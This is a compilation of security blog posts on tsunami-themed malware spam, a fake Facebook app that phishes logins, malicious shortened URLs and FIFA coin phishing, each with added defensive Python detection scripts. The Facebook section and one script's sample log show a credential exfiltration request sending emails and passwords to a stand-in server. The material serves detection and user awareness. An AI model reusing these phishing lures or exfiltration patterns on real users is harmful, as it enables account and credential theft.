Spammers Continue to Exploit the Disaster in Japan

Symantec has blogged previously about spammers exploiting the recent catastrophic situation in Japan. Since then, Symantec has observed additional variations in spam attacks in which the spammers are continuing to exploit the tragedy, even as the earthquake and tsunami relief efforts are in progress. Similar to what we have seen in the past, virus attacks in the form of messages containing links to images in the message body were observed in the third week of March. Such attacks, along with scam emails, are usually prevalent after such disasters have occurred. The subject line and screenshot of a sample message body of the virus attack can be seen below.

Subject: Novo tsunami atinge Sendai e Japao declara estado de emergencia em usina nuclear
[Subject: New tsunami hits Japan Sendai and declares state of emergency in nuclear plant]

As seen in the screenshot above, what appears to be a video is in fact just a link to an image. Once the link is clicked, the user is asked to download and install an executable file (“XAR485849834.exe” – screenshot below) that is malware related to a Brazilian banking Trojan. The link to the image hxxp://xxx.<removed>trade.com/globo.com.html leads the user to download the malware payload from the attacking machine. After it has been successfully installed, the malware gathers the user’s Internet banking details and other sensitive information.

Similar to the sample above, another variation of the spam attack has a message that lures the user into watching a video of the devastating tsunami in Japan. The From and Subject lines of the spam message are below.

From: "Veja o video gravado no momento do tsunami no japao." <[email protected]>
Subject: Veja o video gravado no momento do tsunami no japao.

The English translation of the subject line and body of the spam message (in Portuguese) is below.

Subject: Watch the video recorded at the time of the tsunami in Japan.

Camera man was able to shoot everything
View video

What appears to be a video is again just an image that is composed of a link to the attacking machine that downloads the malware. The IP addresses involved in the above spam attacks are traced back to Brazil.

The scammers have also been exploiting the relief efforts by sending 419 scam emails, which have been prevalent ever since the natural disaster took place. In another variation of the Nigerian scam that has been observed recently, the fake message urges people to help the survivors of the earthquake and tsunami while the country is battling a nuclear crisis.

The message lists the various organizations working on relief and recovery in the region. However, towards the end of the message, the scammer requests a donation in the form of a wire transfer payment through a popular service. The scammer also asks the sender to email the complete details of the transaction (as mentioned on the receipt) to an email address that quite obviously belongs to the scammers. Scammers favor wire transfer services because payments are irreversible, untraceable, and require minimal identity checks. The IP address 82.128.7.139, which is involved in the scam email, was traced back to Lagos, Nigeria. This IP has been blacklisted because of its past involvement in such scams.

Symantec recommends that readers reach out to the earthquake and tsunami victims through legitimate and secure channels so that the help they send reaches the intended recipients. Moreover, be cautious of downloading certain file types, particularly executables (.exe). Any email containing or leading to this type of application extension should be considered suspicious, particularly if it is coming from an unknown sender.
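As an added illustration of that advice (this is example code written for this page, not Symantec's own tooling), the following script parses a MIME message and flags both attachments and links whose file extension marks them as executable, which is exactly the pattern used by the "video" lure described above. The sample message, the 203.0.113.7 address and the extensions beyond .exe are constructed or assumed for the demo.

```python
"""Added example: flag e-mail messages that carry or link to executable files.

Not Symantec's code. The message below is constructed; the extension list
beyond .exe is an assumption, extend it to match your own gateway policy.
"""
import email
import re
from email import policy
from urllib.parse import urlsplit

# File extensions treated as executable content. Only .exe is named in the post;
# the rest are assumed additions.
EXECUTABLE_EXTENSIONS = (".exe", ".scr", ".com", ".pif", ".bat", ".cmd")

# Pulls http(s) URLs out of plain text or raw HTML (href="..." included).
URL_RE = re.compile(r"""https?://[^\s"'<>]+""")

# Constructed sample modelled on the lure described above: an image that looks
# like a video player, a link to an .exe, and an executable attachment.
SAMPLE_EMAIL = """\
From: "Veja o video" <noreply@example.invalid>
To: victim@example.invalid
Subject: Veja o video gravado no momento do tsunami no japao.
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Camera man was able to shoot everything</p>
<a href="http://203.0.113.7/globo.com.html"><img src="http://203.0.113.7/play.jpg"></a>
<a href="http://203.0.113.7/XAR485849834.exe">View video</a>
</body></html>
--b1
Content-Type: application/octet-stream; name="tsunami_video.exe"
Content-Disposition: attachment; filename="tsunami_video.exe"
Content-Transfer-Encoding: base64

Q29uc3RydWN0ZWQgc2FtcGxlLCBub3QgYSByZWFsIGJpbmFyeQ==
--b1--
"""


def has_executable_extension(name):
    """True if the file name or URL path ends in one of the watched extensions."""
    return name.lower().rstrip("/").endswith(EXECUTABLE_EXTENSIONS)


def scan_message(raw):
    """Return (kind, value) findings: executable attachments and links to executables."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        filename = part.get_filename()
        if filename and has_executable_extension(filename):
            findings.append(("attachment", filename))
        # Only text bodies are searched for links; multipart containers are skipped.
        if part.get_content_type() in ("text/plain", "text/html"):
            for url in URL_RE.findall(part.get_content()):
                if has_executable_extension(urlsplit(url).path):
                    findings.append(("link", url))
    return findings


def is_suspicious(raw):
    """Gateway-style verdict: any executable attachment or link makes the mail suspicious."""
    return bool(scan_message(raw))


if __name__ == "__main__":
    for kind, value in scan_message(SAMPLE_EMAIL):
        print(f"{kind}: {value}")
```

The check deliberately looks at the URL path rather than the link text, because the visible text ("View video") says nothing about what is downloaded; a production filter would also inspect the content type and magic bytes of anything fetched, since a server can serve an executable from a .html path.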

Note: My thanks to Carlos Mejia, Mayur Deshpande, and Paresh Joshi for the spam samples contributed to this blog.

Another Fake Facebook App is Here to Steal your Passwords

Recently, we came across an application that displays the message “Tornado Randomly Appears During Soccer Game” on Facebook:

Clicking on the message forces the download of a script from http://<IP Removed>/fb2.js, which displays a Facebook login message. If the user is logged in to Facebook, the malicious app will log the user out and ask him/her to log in again:

When the user clicks on the “Login” button, it will show the login form:

When the user enters login details and clicks on the Login button, the fake application sends two POST requests: one to Facebook.com, and the other to the malicious server. The request sent to the malicious server has the following format:

http://IPRemoved/log.php?email=<email address>&pass=<password>

Using best practice advice, one can check the URL information bar to determine the destination of the URL—but that isn’t enough in this case. The URL bar will show apps.facebook.com when the login form is displayed, even though the credentials will be posted to a malicious site instead.
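Because the address bar cannot be trusted here, the reliable signal is on the wire: credentials leaving for a host that is not the site of the page that displayed the form. The following detection, written for this page as an added example (not Symantec's code), runs over a simplified proxy log in the same shape as the Fiddler capture described above and reports credential-bearing requests whose destination is cross-site or an IP literal. The log lines, the `referer=` field format and the 203.0.113.5 address are constructed.

```python
"""Added example: spot credentials leaving for a host other than the page that
collected them, using a simplified HTTP proxy log. Not Symantec's code; the
log lines and the 203.0.113.5 address are constructed."""
import ipaddress
from urllib.parse import urlsplit, parse_qs

# Query/form parameter names that usually carry credentials (assumed list).
CREDENTIAL_KEYS = {"email", "user", "login", "username", "pass", "passwd", "password", "pwd"}

# Constructed log: "<METHOD> <URL> referer=<page that issued the request>"
SAMPLE_LOG = """\
POST https://www.facebook.com/login.php referer=https://apps.facebook.com/video-app/
POST http://203.0.113.5/log.php?email=victim%40example.invalid&pass=hunter2 referer=https://apps.facebook.com/video-app/
GET http://203.0.113.5/fb2.js referer=https://apps.facebook.com/video-app/
GET https://www.facebook.com/login.php?email=victim%40example.invalid referer=https://www.facebook.com/
"""


def registrable_domain(host):
    """Rough same-site check: last two labels. Use the Public Suffix List in production."""
    labels = host.lower().split(".")
    return ".".join(labels[-2:])


def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def analyze_request(method, url, referer):
    """Return a finding dict if the request carries credential parameters, else None."""
    u = urlsplit(url)
    cred_params = sorted(k for k in parse_qs(u.query) if k.lower() in CREDENTIAL_KEYS)
    if not cred_params:
        return None
    target = u.hostname or ""
    origin = urlsplit(referer).hostname or ""
    # An IP-literal destination is never the same site as a branded login page.
    cross_site = is_ip_literal(target) or registrable_domain(target) != registrable_domain(origin)
    return {
        "method": method,
        "target_host": target,
        "page_host": origin,
        "params": cred_params,
        "cross_site": cross_site,
        "ip_literal": is_ip_literal(target),
    }


def find_credential_leaks(log_text):
    """Credential-bearing requests whose destination is not the page's own site."""
    leaks = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        method, url, ref = line.split(" ", 2)
        finding = analyze_request(method, url, ref.partition("=")[2])
        if finding and finding["cross_site"]:
            leaks.append(finding)
    return leaks


if __name__ == "__main__":
    for leak in find_credential_leaks(SAMPLE_LOG):
        print(f"{leak['method']} -> {leak['target_host']} carries {leak['params']} from {leak['page_host']}")
```

Two points worth noting from the output: the legitimate POST to Facebook is not flagged even though it is a login, and the leak is caught regardless of what the browser's address bar showed, because the decision is made on the request's actual destination. A password in a query string is also a finding in its own right, since it lands in every proxy and web-server log along the way.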

The following are the Fiddler logs that show email addresses and passwords being posted to the malicious server:


The bogus app also "likes" the link in an automatic post, which will be displayed on the user's profile:


We have also observed a similar attack hosted on the same IP address. It displays a different message: “Video: This is the best April Fools' prank ever!” This attack also employs the same technique, as mentioned above, in order to steal usernames and passwords for users’ Facebook accounts:

The good news is that Symantec customers are protected from this attack. We at Symantec urge the readers to install all security patches and definitions regularly.

Taking the Shortcut to Malicious Attacks

Shortened URLs have become popular in recent years as a means of conserving space in character-limited text fields, such as those used for micro-blogging. Some URLs consist of a substantial number of characters that can eat up character limits, break the flow of text, or cause distortions in how Web pages are rendered for users. URL shortening services allow people to submit a URL and receive a second, specially coded shortened URL that redirects to the original URL. When a user clicks on the shortened URL, the service will redirect the person to the submitted Web page.

Attackers are taking advantage of this type of service because it helps to hide the actual destination URL. Attackers use the shortened links, which may or may not be legitimate, to lead unwitting users to malicious websites that are designed to attack any system using a vulnerable browser. 
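The defensive counterpart to a hidden destination is to resolve the shortened URL before anyone clicks it. The script below is an added example written for this page (not Symantec's code): it follows the redirect chain one hop at a time with HEAD requests, never fetching the page body, and stops on loops or excessive hops, so an analyst or gateway sees every intermediary host and the final destination. The redirect table, the `short.example` and `hop.example` hostnames and the `url-preview/1.0` user agent are constructed so the demo runs offline; `live_head_fetch` is the network-backed version.

```python
"""Added example: preview where a shortened URL ends up before anyone clicks it.
Not Symantec's code. live_head_fetch needs network access; the redirect table and
hostnames below are constructed so the demo runs offline."""
from http.client import HTTPConnection, HTTPSConnection
from urllib.parse import urljoin, urlsplit

REDIRECT_STATUSES = {301, 302, 303, 307, 308}
MAX_HOPS = 10


def live_head_fetch(url, timeout=5):
    """One hop: HEAD the URL and return (status, Location header). Never fetches the body."""
    u = urlsplit(url)
    conn_cls = HTTPSConnection if u.scheme == "https" else HTTPConnection
    path = (u.path or "/") + ("?" + u.query if u.query else "")
    conn = conn_cls(u.netloc, timeout=timeout)
    try:
        conn.request("HEAD", path, headers={"User-Agent": "url-preview/1.0"})
        resp = conn.getresponse()
        return resp.status, resp.getheader("Location")
    finally:
        conn.close()


def expand(url, fetch=live_head_fetch, max_hops=MAX_HOPS):
    """Follow redirects hop by hop, stopping on loops or too many hops.

    Returns {"status": resolved|loop|too_many_hops, "final": url, "chain": [urls]}.
    """
    chain = [url]
    seen = {url}
    current = url
    for _ in range(max_hops):
        status, location = fetch(current)
        if status not in REDIRECT_STATUSES or not location:
            return {"status": "resolved", "final": current, "chain": chain}
        nxt = urljoin(current, location)  # Location may be relative
        if nxt in seen:
            return {"status": "loop", "final": nxt, "chain": chain + [nxt]}
        seen.add(nxt)
        chain.append(nxt)
        current = nxt
    return {"status": "too_many_hops", "final": current, "chain": chain}


def hosts_visited(result):
    """Distinct hosts along the chain, in order, so an analyst sees every intermediary."""
    hosts = []
    for u in result["chain"]:
        h = urlsplit(u).hostname
        if h and h not in hosts:
            hosts.append(h)
    return hosts


# Constructed redirect table standing in for shortener responses (offline demo).
FAKE_RESPONSES = {
    "http://short.example/abc": (301, "https://hop.example/x9"),
    "https://hop.example/x9": (302, "/landing"),
    "https://hop.example/landing": (200, None),
    "http://short.example/loop1": (302, "http://short.example/loop2"),
    "http://short.example/loop2": (302, "http://short.example/loop1"),
}


def fake_fetch(url):
    return FAKE_RESPONSES.get(url, (404, None))


if __name__ == "__main__":
    r = expand("http://short.example/abc", fetch=fake_fetch)
    print(r["status"], "->", r["final"], "via", hosts_visited(r))
```

Resolving with HEAD keeps the previewer from executing whatever the landing page serves, and the hop limit matters because shortener-to-shortener chains are a common way to defeat naive one-hop expansion. Some servers redirect only on GET or only for a browser user agent, so a production previewer should fall back to a GET with the body discarded when HEAD returns nothing useful.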

Social networks are a security concern for organizations because they provide an effective platform for attackers to launch this type of attack. Users who see a link posted by a friend may be more likely to trust (and click on) links posted on social networking sites, with little fear of danger. Therefore, an attacker who compromises a social networking account can prey on the inherent trust of the social network connected to that account and post URLs that link to malicious websites. During a three-month observation period in 2010, two-thirds of the malicious URLs observed on social networks were shortened URLs. Currently, most malicious URLs on social networking sites lead to websites that are hosting attack toolkits.

Using malicious shortened URLs can be a very successful method of attack. Symantec measured the number of times a malicious shortened URL was clicked on to determine the success of the link. Of the shortened URLs leading to malicious websites that Symantec observed on social networking sites over a four-month period in 2010, 88 percent were clicked on at least once.

As more people join and frequent social networking sites and the sophistication of these sites grows, it is likely that more complex attacks will be perpetrated through them, including the use of malicious shortened URLs. In addition, these threats should be a concern for network administrators because many users access their social networks from work computers. Users should ensure that they monitor the security settings of their profiles on these sites as much as possible, especially because many settings are automatically set to share a wealth of potentially exploitable information. It is up to the user to restrict access to his or her social networking profile.

For further information on these and other malicious attacks, please refer to the Symantec Internet Security Threat Report, Vol. 16.

Free Coins for Online FIFA Players

In the past couple of months, Symantec observed phishing sites that spoofed online FIFA games. The legitimate game is played by forming a team of footballers purchased with coins. The more games you win with your team, the more coins you gain. The more popular and skilled footballers cost a higher number of coins.

The phishing campaign was launched with fake offers of free coins to lure online FIFA players. One of the phishing sites was purportedly from a player who sympathized with end users who struggle with the game. The phishing site contained a message from this fictitious player expressing the embarrassment one goes through for having a team of low-profile footballers. The message explained that the site would help players generate free coins so that they could form a more expensive team of footballers. The phishing site prompted users to log in with their email address and password to gain up to 10,000 free coins per day. The phishing pages featured popular footballers such as Wayne Rooney, Ronaldinho, Frank Lampard, and Xavi, giving the impression that one could buy these players upon generating the free coins. If end users fell victim to the phishing site, phishers would have successfully stolen their information for identity theft.

The following are some noteworthy statistics observed about the phishing attack:

· 89% of the phishing sites were hosted on free Web hosting sites.

· 5% used IP domains (for example, domains that look like 255.255.255.255).

· 13% were typosquatting. (Typosquatting refers to the practice of registering domain names that are typo variations of popular Web sites.)

· The country code top-level domains (ccTLDs) most utilized were those of Tokelau (.tk) and the United Kingdom (.uk), with 3% and 0.4% of the phishing attacks, respectively.
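To show how hostnames fall into the categories in that list, here is an added example written for this page (not Symantec's code or methodology) that classifies each phishing URL as free hosting, IP-literal domain, typosquat or ccTLD and computes the share of each, the same kind of breakdown reported above. The sample URLs, the `*.example` free-hosting suffixes and the brand list are constructed; the typosquat test is a simple edit-distance check against a brand name, which is one common way to do it, not the only one.

```python
"""Added example: classify phishing hostnames into the categories reported above
(free hosting, IP-literal domains, typosquats, ccTLDs) and compute the shares.
Not Symantec's code; the sample URLs and the free-hosting suffix list are constructed."""
import ipaddress
from urllib.parse import urlsplit

# Placeholder suffixes for free hosting providers; substitute a real list.
FREE_HOSTING_SUFFIXES = ("freehost.example", "webs.example")
# Brand names whose typo variants count as typosquatting.
BRANDS = ("fifa",)

# Constructed sample set, one URL per category plus a plain ccTLD case.
SAMPLE_URLS = [
    "http://fifa-free-coins.freehost.example/login",
    "http://fiifa.tk/coins",
    "http://203.0.113.9/fifa/index.php",
    "http://fifacoins.example.uk/bonus",
    "http://ultimate-coins.webs.example/",
]


def is_ip_literal(host):
    try:
        ipaddress.ip_address(host.strip("[]"))
        return True
    except ValueError:
        return False


def edit_distance(a, b):
    """Levenshtein distance, used to catch one-character typo variants of a brand."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def is_typosquat(host, brands=BRANDS):
    """A label within distance 1 of a brand, but not the brand itself, e.g. 'fiifa'."""
    return any(label != b and edit_distance(label, b) <= 1
               for label in host.split(".") for b in brands)


def is_free_hosting(host, suffixes=FREE_HOSTING_SUFFIXES):
    return any(host == s or host.endswith("." + s) for s in suffixes)


def cctld(host):
    """Two-letter alphabetic last label, or None for IPs and generic TLDs."""
    if is_ip_literal(host):
        return None
    tld = host.rsplit(".", 1)[-1]
    return tld if len(tld) == 2 and tld.isalpha() else None


def classify(url):
    host = (urlsplit(url).hostname or "").lower()
    return {
        "host": host,
        "ip_literal": is_ip_literal(host),
        "free_hosting": is_free_hosting(host),
        "typosquat": is_typosquat(host),
        "cctld": cctld(host),
    }


def summarize(urls):
    """Percentage of URLs in each category, and per-ccTLD percentages."""
    rows = [classify(u) for u in urls]
    n = len(rows)

    def pct(count):
        return round(100.0 * count / n, 1)

    summary = {k: pct(sum(r[k] for r in rows)) for k in ("free_hosting", "ip_literal", "typosquat")}
    tlds = {}
    for r in rows:
        if r["cctld"]:
            tlds[r["cctld"]] = tlds.get(r["cctld"], 0) + 1
    summary["cctld"] = {t: pct(c) for t, c in tlds.items()}
    return summary


if __name__ == "__main__":
    print(summarize(SAMPLE_URLS))
```

The categories are not exclusive, which is why the percentages in the post do not sum to 100: a typosquat can sit on a ccTLD, and a free-hosting subdomain can carry a brand name. Edit distance 1 catches doubled or swapped letters but not brand-plus-keyword names like `fifacoins`, so a real classifier usually adds substring and homoglyph checks.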

Internet users are advised to follow best practices to avoid phishing attacks:

•    Do not click on suspicious links in email messages. 

•    Avoid providing any personal information when answering an email.

•    Never enter personal information in a pop-up screen.

•    Frequently update your security software, such as Norton Internet Security 2011, which protects you from online phishing.